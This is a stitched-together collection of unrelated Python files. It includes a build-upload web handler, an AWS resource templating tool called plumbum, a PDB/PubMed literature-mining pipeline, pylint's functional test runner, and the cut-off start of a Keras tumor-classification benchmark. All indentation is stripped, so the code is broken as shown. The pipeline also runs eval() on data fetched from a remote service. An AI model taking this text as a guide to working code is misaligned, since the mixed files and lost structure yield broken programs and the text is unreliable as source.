raise web_exc.HTTPNotFound()
if not os.path.exists(filename):
raise web_exc.HTTPNotFound()
build = self.client.getBuild(buildId)
project = self.client.getProject(build.projectId)
redirectUrl = "/images/%s/%d/%s" % (project.hostname, build.id,
os.path.basename(filename))
if redirectUrl:
self._redirect(redirectUrl)
else:
raise web_exc.HTTPNotFound()
@intFields(userId = None)
@strFields(operation = None)
@requiresAdmin
def processUserAction(self, auth, userId, operation):
user = self.client.getUser(userId)
deletedUser = False
if operation == "user_reset_password":
self._resetPasswordById(userId)
self._setInfo("Password successfully reset for user %s." % \
user.username)
else:
self._addErrors("Please select a valid user adminstration action "
"from the menu.")
if deletedUser:
return self._redirectHttp()
else:
return self._redirectHttp("userInfo?id=%d" % (userId,))
def uploadBuild(self, auth):
method = self.req.method.upper()
if method != "PUT":
raise web_exc.HTTPMethodNotAllowed(allow='PUT')
client = shimclient.ShimMintClient(self.cfg,
(self.cfg.authUser, self.cfg.authPass), self.db)
buildId, fileName = self.req.path_info.split("/")[-2:]
build = client.getBuild(int(buildId))
project = client.getProject(build.projectId)
# make sure the hash we receive from the slave matches
# the hash we gave the slave in the first place.
# this prevents slaves from overwriting arbitrary files
# in the finished images directory.
if not auth.admin:
outputToken = self.req.headers.get('X-rBuilder-OutputToken')
if outputToken != build.getDataValue('outputToken', validate = False):
raise web_exc.HTTPForbidden()
targetFn = os.path.join(self.cfg.imagesPath, project.hostname,
str(buildId), fileName)
util.mkdirChain(os.path.dirname(targetFn))
fObj = AtomicFile(targetFn, 'wb+', prefix='img-', suffix='.tmp')
ctx = digestlib.sha1()
inFile = None
if 'x-uploaded-file' in self.req.headers:
# The frontend proxy has already saved the request body to a
# temporary location, so first try to rename it into place.
try:
os.rename(self.req.headers['x-uploaded-file'], fObj.name)
except OSError, err:
if err.errno != errno.EXDEV:
raise
# Upload dir is on a different filesystem.
inFile = open(self.req.headers['x-uploaded-file'], 'rb')
else:
# No offloading was done. Copy from the request body.
inFile = self.req.body_file
if inFile:
# Copy and digest simultaneously
try:
copied = util.copyfileobj(self.req.body_file, fObj, digest=ctx)
except IOError, err:
log.warning("IOError during upload of %s: %s", targetFn, str(err))
raise web_exc.HTTPBadRequest()
else:
# Just digest
with open(fObj.name) as inFile:
while True:
data = inFile.read(1024)
if not data:
break
ctx.update(data)
if 'content-length' in self.req.headers:
expected = long(self.req.headers['content-length'])
if copied != expected:
log.warning("Expected %d bytes but got %d bytes for "
"uploaded file %s; discarding", expected, copied,
targetFn)
return ''
fObj.commit(sync=False)
# Write out digest, to be validated when the jobslave posts the final
# image file list.
fObj = AtomicFile(targetFn + '.sha1', 'w')
print >> fObj, ctx.hexdigest()
fObj.commit()
return ''
def conaryrc(self, auth):
out = ''
if self.req.params.get('repositoryMap') != 'no':
repoMap = {}
for handle in self.reposShim.iterRepositories('NOT disabled'):
repoMap[handle.fqdn] = handle.getURL()
for name, url in sorted(repoMap.items()):
out += 'repositoryMap %s %s\n' % (name, url)
if self.req.params.get('proxyMap') != 'no':
proxy = 'conarys://' + self.req.application_url.split('://')[-1]
out += 'proxyMap * %s\n' % proxy
self.response.content_type = 'text/plain'
return out
|
|
# -*- coding: UTF-8 -*-
"""
Usage:
plumbum <template> <namespace> [region] [options]...
Options:
template path to the jinja2 template
namespace AWS namespace. Currently supports: elasticache, elb, ec2, rds, asg, sqs
region AWS region [default: us-east-1]
options key value combinations, they can be tags or any other property
Examples:
plumbum elb.yaml.j2 elb
plumbum elb.yaml.j2 elb us-west-2
plumbum ec2.yaml.j2 ec2 environment=production
plumbum ec2.yaml.j2 ec2 us-west-2 environment=production
Outputs to stdout.
About Templates:
Templates are used to generate config.yml files based on running resources.
They're written in jinja2, and have these variables available:
filters A dictionary of the filters that were passed in
region The region the resource is located in
resources A list of the resources as boto objects
"""
from __future__ import unicode_literals
import re
import sys
import boto
import boto.dynamodb
import boto.ec2
import boto.ec2.elb
import boto.rds
import boto.elasticache
import boto.ec2.autoscale
import boto.kinesis
import boto.sqs
import jinja2
import os.path
__version__ = '0.8.1'
# DEFAULT_NAMESPACE = 'ec2' # TODO
DEFAULT_REGION = 'us-east-1'
def get_property_func(key):
"""
Get the accessor function for an instance to look for `key`.
Look for it as an attribute, and if that does not work, look to see if it
is a tag.
"""
def get_it(obj):
try:
return getattr(obj, key)
except AttributeError:
return obj.tags.get(key)
return get_it
def filter_key(filter_args):
def filter_instance(instance):
return all([value == get_property_func(key)(instance)
for key, value in filter_args.items()])
return filter_instance
def lookup(instances, filter_by=None):
if filter_by is not None:
return list(filter(filter_key(filter_by), instances))
return instances
def interpret_options(options):
"""Parse all the command line options."""
# template always has to be index 0
template = options[0]
# namespace always has to be index 1. Support 'ec2' (human friendly) and
# 'AWS/EC2' (how CloudWatch natively calls these things)
namespace = options[1].rsplit('/', 2)[-1].lower()
next_idx = 2
# region might be index 2
region = ''
if len(options) > 2 and re.match(r'^\w+\-[\w\-]+\-\d+$', options[2]):
region = options[2]
next_idx += 1
else:
next_idx = 2
region = region or boto.config.get('Boto', 'ec2_region_name', 'us-east-1')
filter_by = {}
extras = []
for arg in options[next_idx:]:
if arg.startswith('-'):
# throw these away for now
extras.append(arg)
elif '=' in arg:
key, value = arg.split('=', 2)
filter_by[key] = value
else:
# throw these away for now
extras.append(arg)
return template, namespace, region, filter_by, extras
def list_ec2(region, filter_by_kwargs):
"""List running ec2 instances."""
conn = boto.ec2.connect_to_region(region)
instances = conn.get_only_instances()
return lookup(instances, filter_by=filter_by_kwargs)
def list_elb(region, filter_by_kwargs):
"""List all load balancers."""
conn = boto.ec2.elb.connect_to_region(region)
instances = conn.get_all_load_balancers()
return lookup(instances, filter_by=filter_by_kwargs)
def list_rds(region, filter_by_kwargs):
"""List all RDS thingys."""
conn = boto.rds.connect_to_region(region)
instances = conn.get_all_dbinstances()
return lookup(instances, filter_by=filter_by_kwargs)
def list_elasticache(region, filter_by_kwargs):
"""List all ElastiCache Clusters."""
conn = boto.elasticache.connect_to_region(region)
req = conn.describe_cache_clusters()
data = req["DescribeCacheClustersResponse"]["DescribeCacheClustersResult"]["CacheClusters"]
clusters = [x['CacheClusterId'] for x in data]
return clusters
def list_autoscaling_group(region, filter_by_kwargs):
"""List all Auto Scaling Groups."""
conn = boto.ec2.autoscale.connect_to_region(region)
groups = conn.get_all_groups()
return lookup(groups, filter_by=filter_by_kwargs)
def list_sqs(region, filter_by_kwargs):
"""List all SQS Queues."""
conn = boto.sqs.connect_to_region(region)
queues = conn.get_all_queues()
return lookup(queues, filter_by=filter_by_kwargs)
def list_kinesis_applications(region, filter_by_kwargs):
"""List all the kinesis applications along with the shards for each stream"""
conn = boto.kinesis.connect_to_region(region)
streams = conn.list_streams()['StreamNames']
kinesis_streams = {}
for stream_name in streams:
shard_ids = []
shards = conn.describe_stream(stream_name)['StreamDescription']['Shards']
for shard in shards:
shard_ids.append(shard['ShardId'])
kinesis_streams[stream_name] = shard_ids
return kinesis_streams
def list_dynamodb(region, filter_by_kwargs):
"""List all DynamoDB tables."""
conn = boto.dynamodb.connect_to_region(region)
tables = conn.list_tables()
return lookup(tables, filter_by=filter_by_kwargs)
list_resources = {
'ec2': list_ec2,
'elb': list_elb,
'rds': list_rds,
'elasticache': list_elasticache,
'asg': list_autoscaling_group,
'sqs': list_sqs,
'kinesisapp': list_kinesis_applications,
'dynamodb': list_dynamodb
}
def main():
if '--version' in sys.argv:
print(__version__)
sys.exit()
if len(sys.argv) < 3:
print(__doc__)
sys.exit()
template, namespace, region, filters, __ = interpret_options(sys.argv[1:])
# get the template first so this can fail before making a network request
fs_path = os.path.abspath(os.path.dirname(template))
loader = jinja2.FileSystemLoader(fs_path)
jinja2_env = jinja2.Environment(loader=loader)
template = jinja2_env.get_template(os.path.basename(template))
# insure a valid region is set
if region not in [r.name for r in boto.ec2.regions()]:
raise ValueError("Invalid region:{0}".format(region))
# should I be using ARNs?
try:
resources = list_resources[namespace](region, filters)
except KeyError:
print('ERROR: AWS namespace "{}" not supported or does not exist'
.format(namespace))
sys.exit(1)
print(template.render({
'filters': filters,
'region': region, # Use for Auth config section if needed
'resources': resources,
}))
if __name__ == '__main__':
main()
|
|
# -*- coding: utf-8 -*-
import sys
import traceback
import datetime
import time
import os
import logging
import MySQLdb
import labio.configWrapper
import labio.argParseWrapper
import labio.logWrapper
import labio.dbWrapper
from xml.etree import ElementTree
from bs4 import *
from components import PDB
from components.PubMed import *
from suds.client import Client
#----------------------------------------------------------------------------------------------------------------------#
def retrieve_structures(cfg,log):
final_list = None
try:
resList = []
for item in cfg.pdbQueries:
res = PDB.execute_advanced_query(log, cfg.pdbAdvancedSearchURL,item)
resList.append(res.split('\n'))
log.info('Intersecting results...')
final_list = list(eval(PDB.merge_results(resList)))
final_list = filter(len,final_list)
except:
log.error(traceback.format_exc())
return final_list
def save_structures(cfg,log,db,listItem):
try:
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateCandidate)
for item in listItem:
log.info('Saving Candidate: %s...' % item)
if PDB.get_file(cfg,log,item):
pdb = PDB.parse_header(cfg,item)
db.executeCommand(cfg.sqlInsertCandidate,(item, MySQLdb.escape_string(PDB.get_content()),
MySQLdb.escape_string(pdb['name']),
MySQLdb.escape_string(pdb['author']),
pdb['deposition_date'],
pdb['release_date'], '0',
pdb['resolution'],
pdb['head'],
pdb['structure_method'],
pdb['compound']['1']['chain'] if 'chain' in pdb['compound']['1'] else '' ,
pdb['compound']['1']['ec_number'] if 'ec_number' in pdb['compound']['1'] else '',
pdb['source']['1']['organism_taxid'] if 'organism_taxid' in pdb['source']['1'] else '',
pdb['source']['1']['organism_scientific'] if 'organism_scientific' in pdb['source']['1'] else '',
pdb['source']['1']['expression_system_taxid'] if 'expression_system_taxid' in pdb['source']['1'] else '',
pdb['source']['1']['expression_system'] if 'expression_system' in pdb['source']['1'] else ''))
db.commit()
except:
log.error(traceback.format_exc())
db.rollback()
def build_training_set(cfg,log,db,pm):
try:
listAdded = []
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateTrainingSet)
log.info('Getting Reference articles...')
candidates = db.getData(cfg.sqlSelectCandidates).fetchall()
for addFile in candidates:
key = addFile[0]
f = PDB.parse_prody(cfg,key)
if f.status == 'Imported' and (f.journal.pmid not in listAdded) and f.journal.pmid != "":
article = pm.get_pubmed_article(f.journal.pmid)
pm.save_pubmed_article(f.journal.pmid,article,'Training')
listAdded.append(f.journal.pmid)
db.commit()
except:
log.error(traceback.format_exc())
db.rollback()
raise Exception('Training Set was not built.')
def search_literature(cfg,log,db,pm):
try:
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateLiterature)
result = pm.search_pubmed()
if result:
log.info('Number of entries: %s...' % result['Count'])
for item in result['IdList']:
try:
resCount = db.getData(cfg.sqlCountLiterature % (item))
row = resCount.fetchall()
if row[0][0] == 0:
article = pm.get_pubmed_article(item)
if not pm.save_pubmed_article(item, article, 'Literature'):
print(article)
resCount.close()
except:
log.error(traceback.format_exc())
db.commit()
else:
log.info('No PubMed literature found.')
except:
db.rollback()
log.error(traceback.format_exc())
raise Exception('Literature not added.')
def rank_literature(cfg,log,db):
e = None
try:
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateWords)
client = Client(cfg.MedLineRankURL)
log.info('Preparing Training Set...')
trainingCursor = db.getData(cfg.sqlSelectTrainingSet).fetchall()
trainingList = []
for line in trainingCursor:
trainingList.append(line[0])
trainingSet = cfg.pubmedDelimiter.join(trainingList)
log.info('Preparing Articles to Rank...')
testingCursor = db.getData(cfg.sqlSelectTestingSet).fetchall()
testingList = []
for line in testingCursor:
testingList.append(line[0])
testingSet = cfg.pubmedDelimiter.join(testingList)
log.info('Calling the Web Service...')
html = client.service.rank('list',trainingSet,'medline','','list',testingSet)
fw = open(os.path.join(cfg.extractFilesFolder,cfg.pubmedRankFile), "w")
if cfg.pubmedFindString in html:
fw.write(html)
else:
fw.write(html.decode('base64'))
fw.close()
e = ElementTree.parse(os.path.join(cfg.extractFilesFolder,cfg.pubmedRankFile)).getroot()
if e is not None:
log.info('Updating articles...')
for abstract in e.findall(cfg.rankAbstracts):
db.executeCommand(cfg.sqlUpdateLiterature,(abstract.get('rank'),abstract.find('pvalue').text,abstract.find('link').text,abstract.find('pmid').text))
log.info('Saving word list...')
for abstract in e.findall(cfg.rankWords):
db.executeCommand(cfg.sqlInsertWords,(abstract.get('rank'),abstract.find('value').text,abstract.find('weight').text))
db.commit()
except:
log.error(traceback.format_exc())
db.rollback()
def relate_structures(cfg,log,db, pm):
try:
log.info('Merging Training and Result Sets...')
rows = db.getData(cfg.sqlCopyTrainingSetIntoLiterature).fetchall()
for row in rows:
article = pm.get_pubmed_article(row['pubmed_id'])
pm.save_pubmed_article(row['pubmed_id'], article, 'Literature')
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateRel)
candidates = db.getData(cfg.sqlSelectCandidates).fetchall()
for addFile in candidates:
key = addFile['pdbID']
f = PDB.parse_prody(cfg,key)
if f.journal.pmid != "":
db.executeCommand(cfg.sqlInsertRel, (addFile['pdbID'], f.journal.pmid, 'Originator'))
log.info('Opening article to find references to structures...')
fileName = pm.get_related_pubmed_articles(f.journal.pmid)
for item in fileName[0]['LinkSetDb'][0]['Link']:
db.executeCommand(cfg.sqlInsertRel, (addFile['pdbID'], item['Id'], 'Related'))
db.commit()
except:
db.rollback()
log.error(traceback.format_exc())
raise Exception('Training Set was not built.')
def retrieve_ligands(cfg,log,db):
try:
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateLigands)
structs = db.getData(cfg.sqlSelectCandidates).fetchall()
for strut in structs:
json_string = PDB.get_ligands(cfg,strut[0])
if json_string and json_string['structureId'] and json_string['structureId']['ligandInfo']:
if type(json_string['structureId']['ligandInfo']['ligand']) == dict:
item = json_string['structureId']['ligandInfo']['ligand']
db.executeCommand(cfg.sqlInsertLigand,(strut[0], item['@chemicalID'], item['chemicalName'],item['@type'],item['formula'],item['@molecularWeight']))
else:
for item in json_string['structureId']['ligandInfo']['ligand']:
db.executeCommand(cfg.sqlInsertLigand,(strut[0], item['@chemicalID'], item['chemicalName'],item['@type'],item['formula'],item['@molecularWeight']))
db.commit()
except:
log.error(traceback.format_exc())
db.rollback()
def retrieve_go_terms(cfg,log,db):
try:
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncateGoTerms)
structs = db.getData(cfg.sqlSelectCandidates).fetchall()
for strut in structs:
log.info('Getting GO terms for structure %s' % strut[0])
json_string = PDB.get_go_terms(cfg,strut[0])
if json_string and json_string['goTerms'] and json_string['goTerms']['term']:
if type(json_string['goTerms']['term']) == dict:
item = json_string['goTerms']['term']
if '@synonyms' in json_string['goTerms']['term']:
db.executeCommand(cfg.sqlInsertGoTerms,(strut[0], item['@chainId'], item['@id'],item['detail']['@name'],item['detail']['@definition'],item['detail']['@synonyms'],item['detail']['@ontology']))
else:
db.executeCommand(cfg.sqlInsertGoTerms,(strut[0], item['@chainId'], item['@id'],item['detail']['@name'],item['detail']['@definition'],None,item['detail']['@ontology']))
else:
for item in json_string['goTerms']['term']:
if '@synonyms' in json_string['goTerms']['term']:
db.executeCommand(cfg.sqlInsertGoTerms,(strut[0], item['@chainId'], item['@id'],item['detail']['@name'],item['detail']['@definition'],item['detail']['@synonyms'],item['detail']['@ontology']))
else:
db.executeCommand(cfg.sqlInsertGoTerms,(strut[0], item['@chainId'], item['@id'],item['detail']['@name'],item['detail']['@definition'],None,item['detail']['@ontology']))
db.commit()
except:
log.error(traceback.format_exc())
def retrieve_genbank_info(cfg,log,db):
try:
structs = db.getData(cfg.sqlSelectCandidates).fetchall()
html = None
for item in structs:
html = None
try:
html = PDB.get_genbank_info(cfg,log,item[0])
tree = ElementTree.fromstring(html)
gb_sequence = tree.findall('.//GBSeq/GBSeq_sequence')[0].text
gb_taxonomy = tree.findall('.//GBSeq/GBSeq_taxonomy')[0].text
gb_seq_length = tree.findall('.//GBSeq/GBSeq_length')[0].text
gb_seqids = tree.findall('.//GBSeq/GBSeq_other-seqids/GBSeqid')
gb_gi = None
for node in gb_seqids:
if 'gi|' in node.text:
gb_gi = node.text.replace('gi|','')
db.executeCommand(cfg.sqlUpdateGenBank,(gb_taxonomy, gb_sequence, gb_seq_length, gb_gi, item[0]))
log.info('Updating information with GenBank data for structure %s.' % item[0])
except:
log.info('No information found on GenBank for structure %s.' % item[0])
#if html is not None:
# raise
time.sleep(2)
db.commit()
except:
log.error(traceback.format_exc())
def retrieve_pathways(cfg,log,db):
try:
if cfg.FullReload:
db.executeCommand(cfg.sqlTruncatePathway)
structs = db.getData(cfg.sqlSelectCandidates).fetchall()
html = None
for item in structs:
log.info('Finding pathway data for structure %s.' % item[0])
html = None
try:
html = PDB.get_pathways_info(cfg, log, item[1])
soup = BeautifulSoup(html)
links = soup.findAll('a')
for link in links:
if 'href' in link.attrs[0]:
if 'show_pathway' in link.attrs[0][1]:
db.executeCommand(cfg.sqlInsertPathway,(item[0],cfg.keggRootURL + link.attrs[0][1],link.contents[0]))
except:
raise
db.commit()
except:
log.error(traceback.format_exc())
#----------------------------------------------------------------------------------------------------------------------#
def Execute(cfgName):
returnValue = 0
print(datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
print("Loading Configuration... %s" % cfgName)
fileConfig = labio.configWrapper.load_configuration(cfgName)
if fileConfig.isLoaded:
#Initializing the log system
try:
nlogging = labio.logWrapper.return_logging(fileConfig.log)
except:
returnValue = 1
print(traceback.format_exc())
if returnValue == 0:
try:
nlogging.info('Starting process...')
#Connecting to the MySQL database
db2 = labio.dbWrapper.dbGenericWrapper(fileConfig.database).getDB()
if db2.isDatabaseOpen():
nlogging.info('Database opened.')
nlogging.info('Starting Integration Objects.')
pmed = PubMed(fileConfig,nlogging,db2)
if fileConfig.Actions["retrieve_structures"] or fileConfig.RunAll:
nlogging.info('Retrieving PDB Structures...')
final_list = retrieve_structures(fileConfig,nlogging)
if final_list:
#nlogging.info('Number of structures found: %s' % (len(final_list)))
nlogging.info('Adding Candidates to the database...')
save_structures(fileConfig,nlogging,db2,final_list)
else:
nlogging.info('No PDB structures found.')
if fileConfig.Actions['retrieve_ligands'] or fileConfig.RunAll:
nlogging.info('Finding Ligands...')
retrieve_ligands(fileConfig,nlogging,db2)
if fileConfig.Actions['retrieve_go_terms'] or fileConfig.RunAll:
nlogging.info('Finding related Gene Ontology terms...')
retrieve_go_terms(fileConfig,nlogging,db2)
if fileConfig.Actions['retrieve_genbank_info'] or fileConfig.RunAll:
nlogging.info('Finding GenBank Data...')
retrieve_genbank_info(fileConfig,nlogging,db2)
if fileConfig.Actions['retrieve_pathways'] or fileConfig.RunAll:
nlogging.info('Finding Pathways...')
retrieve_pathways(fileConfig,nlogging,db2)
if fileConfig.Actions['refresh_list'] or fileConfig.RunAll:
nlogging.info('Refreshing list of OA articles')
pmed.retrieve_file_list()
if fileConfig.Actions["build_training_set"] or fileConfig.RunAll:
if pmed.is_pubmed_online():
nlogging.info('Building Training Set...')
build_training_set(fileConfig,nlogging,db2,pmed)
else:
raise Exception('Pubmed services are not online.')
if fileConfig.Actions["search_literature"] or fileConfig.RunAll:
if pmed.is_pubmed_online():
nlogging.info('Searching articles...')
search_literature(fileConfig,nlogging,db2,pmed)
else:
raise Exception('Pubmed services are not online.')
if fileConfig.Actions['rank_literature'] or fileConfig.RunAll:
nlogging.info('Ranking articles...')
rank_literature(fileConfig,nlogging,db2)
if fileConfig.Actions['relate_structures'] or fileConfig.RunAll:
nlogging.info('Relating Articles to Structures...')
relate_structures(fileConfig,nlogging,db2,pmed)
if fileConfig.Actions['Test'] and not(fileConfig.RunAll):
pmed = pmed.get_pubmed_article('25714709')
print(pmed)
db2.commit()
nlogging.info('Database closed.')
db2.close()
else:
raise Exception('Database not opened.')
nlogging.info('Ending process...')
except:
returnValue = 1
nlogging.error('Unexpected error: %s' % traceback.format_exc())
nlogging.info('Execution aborted due to errors. Please see the log file for more details.')
else:
returnValue = 1
else:
returnValue = 1
return returnValue
#----------------------------------------------------------------------------------------------------------------------#
if __name__ == '__main__':
exitCode = 0
try:
if len(sys.argv) < 2:
cfgName = sys.argv[0].replace(".py",".config")
print(cfgName)
else:
cfgName = sys.argv[1]
exitCode = Execute(cfgName)
except:
print(traceback.format_exc())
exitCode = 1
sys.exit(exitCode)
|
|
# Copyright (c) 2003-2016 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:contact@logilab.fr
# Licensed under the GPL: https://www.gnu.org/licenses/old-licenses/gpl-2.0.html
# For details: https://github.com/PyCQA/pylint/blob/master/COPYING
"""Functional full-module tests for PyLint."""
import csv
import collections
import io
import operator
import os
import re
import sys
import platform
import unittest
import six
from six.moves import configparser
from pylint import checkers
from pylint import interfaces
from pylint import lint
from pylint import reporters
from pylint import utils
class test_dialect(csv.excel):
if sys.version_info[0] < 3:
delimiter = b':'
lineterminator = b'\n'
else:
delimiter = ':'
lineterminator = '\n'
csv.register_dialect('test', test_dialect)
class NoFileError(Exception):
pass
# Notes:
# - for the purpose of this test, the confidence levels HIGH and UNDEFINED
# are treated as the same.
# TODOs
# - implement exhaustivity tests
# If message files should be updated instead of checked.
UPDATE = False
class OutputLine(collections.namedtuple('OutputLine',
['symbol', 'lineno', 'object', 'msg', 'confidence'])):
@classmethod
def from_msg(cls, msg):
return cls(
msg.symbol, msg.line, msg.obj or '', msg.msg.replace("\r\n", "\n"),
msg.confidence.name
if msg.confidence != interfaces.UNDEFINED else interfaces.HIGH.name)
@classmethod
def from_csv(cls, row):
confidence = row[4] if len(row) == 5 else interfaces.HIGH.name
return cls(row[0], int(row[1]), row[2], row[3], confidence)
def to_csv(self):
if self.confidence == interfaces.HIGH.name:
return self[:-1]
else:
return self
# Common sub-expressions.
_MESSAGE = {'msg': r'[a-z][a-z\-]+'}
# Matches a #,
# - followed by a comparison operator and a Python version (optional),
# - followed by an line number with a +/- (optional),
# - followed by a list of bracketed message symbols.
# Used to extract expected messages from testdata files.
_EXPECTED_RE = re.compile(
r'\s*#\s*(?:(?P<line>[+-]?[0-9]+):)?'
r'(?:(?P<op>[><=]+) *(?P<version>[0-9.]+):)?'
r'\s*\[(?P<msgs>%(msg)s(?:,\s*%(msg)s)*)\]' % _MESSAGE)
def parse_python_version(str):
return tuple(int(digit) for digit in str.split('.'))
class TestReporter(reporters.BaseReporter):
def handle_message(self, msg):
self.messages.append(msg)
def on_set_current_module(self, module, filepath):
self.messages = []
def display_reports(self, layout):
"""Ignore layouts."""
class TestFile(object):
"""A single functional test case file with options."""
_CONVERTERS = {
'min_pyver': parse_python_version,
'max_pyver': parse_python_version,
'requires': lambda s: s.split(',')
}
def __init__(self, directory, filename):
self._directory = directory
self.base = filename.replace('.py', '')
self.options = {
'min_pyver': (2, 5),
'max_pyver': (4, 0),
'requires': [],
'except_implementations': [],
}
self._parse_options()
def _parse_options(self):
cp = configparser.ConfigParser()
cp.add_section('testoptions')
try:
cp.read(self.option_file)
except NoFileError:
pass
for name, value in cp.items('testoptions'):
conv = self._CONVERTERS.get(name, lambda v: v)
self.options[name] = conv(value)
@property
def option_file(self):
return self._file_type('.rc')
@property
def module(self):
package = os.path.basename(self._directory)
return '.'.join([package, self.base])
@property
def expected_output(self):
return self._file_type('.txt', check_exists=False)
@property
def source(self):
return self._file_type('.py')
def _file_type(self, ext, check_exists=True):
name = os.path.join(self._directory, self.base + ext)
if not check_exists or os.path.exists(name):
return name
else:
raise NoFileError
_OPERATORS = {
'>': operator.gt,
'<': operator.lt,
'>=': operator.ge,
'<=': operator.le,
}
def parse_expected_output(stream):
return [OutputLine.from_csv(row) for row in csv.reader(stream, 'test')]
def get_expected_messages(stream):
"""Parses a file and get expected messages.
:param stream: File-like input stream.
:returns: A dict mapping line,msg-symbol tuples to the count on this line.
"""
messages = collections.Counter()
for i, line in enumerate(stream):
match = _EXPECTED_RE.search(line)
if match is None:
continue
line = match.group('line')
if line is None:
line = i + 1
elif line.startswith('+') or line.startswith('-'):
line = i + 1 + int(line)
else:
line = int(line)
version = match.group('version')
op = match.group('op')
if version:
required = parse_python_version(version)
if not _OPERATORS[op](sys.version_info, required):
continue
for msg_id in match.group('msgs').split(','):
messages[line, msg_id.strip()] += 1
return messages
def multiset_difference(left_op, right_op):
"""Takes two multisets and compares them.
A multiset is a dict with the cardinality of the key as the value.
:param left_op: The expected entries.
:param right_op: Actual entries.
:returns: The two multisets of missing and unexpected messages.
"""
missing = left_op.copy()
missing.subtract(right_op)
unexpected = {}
for key, value in list(six.iteritems(missing)):
if value <= 0:
missing.pop(key)
if value < 0:
unexpected[key] = -value
return missing, unexpected
class LintModuleTest(unittest.TestCase):
maxDiff = None
def __init__(self, test_file):
super(LintModuleTest, self).__init__('_runTest')
test_reporter = TestReporter()
self._linter = lint.PyLinter()
self._linter.set_reporter(test_reporter)
self._linter.config.persistent = 0
checkers.initialize(self._linter)
self._linter.disable('I')
try:
self._linter.read_config_file(test_file.option_file)
self._linter.load_config_file()
except NoFileError:
pass
self._test_file = test_file
def setUp(self):
if (sys.version_info < self._test_file.options['min_pyver']
or sys.version_info >= self._test_file.options['max_pyver']):
self.skipTest(
'Test cannot run with Python %s.' % (sys.version.split(' ')[0],))
missing = []
for req in self._test_file.options['requires']:
try:
__import__(req)
except ImportError:
missing.append(req)
if missing:
self.skipTest('Requires %s to be present.' % (','.join(missing),))
if self._test_file.options['except_implementations']:
implementations = [
item.strip() for item in
self._test_file.options['except_implementations'].split(",")
]
implementation = platform.python_implementation()
if implementation in implementations:
self.skipTest(
'Test cannot run with Python implementation %r'
% (implementation, ))
def __str__(self):
return "%s (%s.%s)" % (self._test_file.base, self.__class__.__module__,
self.__class__.__name__)
def _open_expected_file(self):
return open(self._test_file.expected_output)
def _open_source_file(self):
if self._test_file.base == "invalid_encoded_data":
return open(self._test_file.source)
else:
return io.open(self._test_file.source, encoding="utf8")
def _get_expected(self):
with self._open_source_file() as fobj:
expected_msgs = get_expected_messages(fobj)
if expected_msgs:
with self._open_expected_file() as fobj:
expected_output_lines = parse_expected_output(fobj)
else:
expected_output_lines = []
return expected_msgs, expected_output_lines
def _get_received(self):
messages = self._linter.reporter.messages
messages.sort(key=lambda m: (m.line, m.symbol, m.msg))
received_msgs = collections.Counter()
received_output_lines = []
for msg in messages:
received_msgs[msg.line, msg.symbol] += 1
received_output_lines.append(OutputLine.from_msg(msg))
return received_msgs, received_output_lines
def _runTest(self):
self._linter.check([self._test_file.module])
expected_messages, expected_text = self._get_expected()
received_messages, received_text = self._get_received()
if expected_messages != received_messages:
msg = ['Wrong results for file "%s":' % (self._test_file.base)]
missing, unexpected = multiset_difference(expected_messages,
received_messages)
if missing:
msg.append('\nExpected in testdata:')
msg.extend(' %3d: %s' % msg for msg in sorted(missing))
if unexpected:
msg.append('\nUnexpected in testdata:')
msg.extend(' %3d: %s' % msg for msg in sorted(unexpected))
self.fail('\n'.join(msg))
self._check_output_text(expected_messages, expected_text, received_text)
def _split_lines(self, expected_messages, lines):
emitted, omitted = [], []
for msg in lines:
if (msg[1], msg[0]) in expected_messages:
emitted.append(msg)
else:
omitted.append(msg)
return emitted, omitted
def _check_output_text(self, expected_messages, expected_lines,
received_lines):
self.assertSequenceEqual(
self._split_lines(expected_messages, expected_lines)[0],
received_lines)
class LintModuleOutputUpdate(LintModuleTest):
def _open_expected_file(self):
try:
return super(LintModuleOutputUpdate, self)._open_expected_file()
except IOError:
return io.StringIO()
def _check_output_text(self, expected_messages, expected_lines,
received_lines):
if not expected_messages:
return
emitted, remaining = self._split_lines(expected_messages, expected_lines)
if emitted != received_lines:
remaining.extend(received_lines)
remaining.sort(key=lambda m: (m[1], m[0], m[3]))
with open(self._test_file.expected_output, 'w') as fobj:
writer = csv.writer(fobj, dialect='test')
for line in remaining:
writer.writerow(line.to_csv())
def suite():
input_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
'functional')
suite = unittest.TestSuite()
for fname in os.listdir(input_dir):
if fname != '__init__.py' and fname.endswith('.py'):
test_file = TestFile(input_dir, fname)
if UPDATE:
suite.addTest(LintModuleOutputUpdate(test_file))
else:
suite.addTest(LintModuleTest(test_file))
return suite
def load_tests(loader, tests, pattern):
return suite()
if __name__=='__main__':
if '-u' in sys.argv:
UPDATE = True
sys.argv.remove('-u')
unittest.main(defaultTest='suite')
|
|
from __future__ import print_function
import pandas as pd
import numpy as np
import os
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Dense, Dropout, Activation, Conv1D, MaxPooling1D, Flatten, LocallyConnected1D
from tensorflow.keras.models import Sequential, model_from_json, model_from_yaml
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.callbacks import CSVLogger, ReduceLROnPlateau
from sklearn.preprocessing import MaxAbsScaler
import nt3 as bmk
import candle
def initialize_parameters(default_model='nt3_default_model.txt'):
# Build benchmark object
nt3Bmk = bmk.BenchmarkNT3(
bmk.file_path,
default_model,
'keras',
prog='nt3_baseline',
desc='1D CNN to classify RNA sequence data in normal or tumor classes')
# Initialize parameters
gParameters = candle.finalize_parameters(nt3Bmk)
return gParameters
def load_data(train_path, test_path, gParameters):
print('Loading data...')
df_train = (pd.read_csv(train_path, header=None).values).astype('float32')
df_test = (pd.read_csv(test_path, header=None).values).astype('float32')
print('done')
print('df_train shape:', df_train.shape)
print('df_test shape:', df_test.shape)
seqlen = df_train.shape[1]
df_y_train = df_train[:, 0].astype('int')
df_y_test = df_test[:, 0].astype('int')
# only training set has noise
Y_train = to_categorical(df_y_train, gParameters['classes'])
Y_test = to_categorical(df_y_test, gParameters['classes'])
df_x_train = df_train[:, 1:seqlen].astype(np.float32)
df_x_test = df_test[:, 1:seqlen].astype(np.float32)
X_train = df_x_train
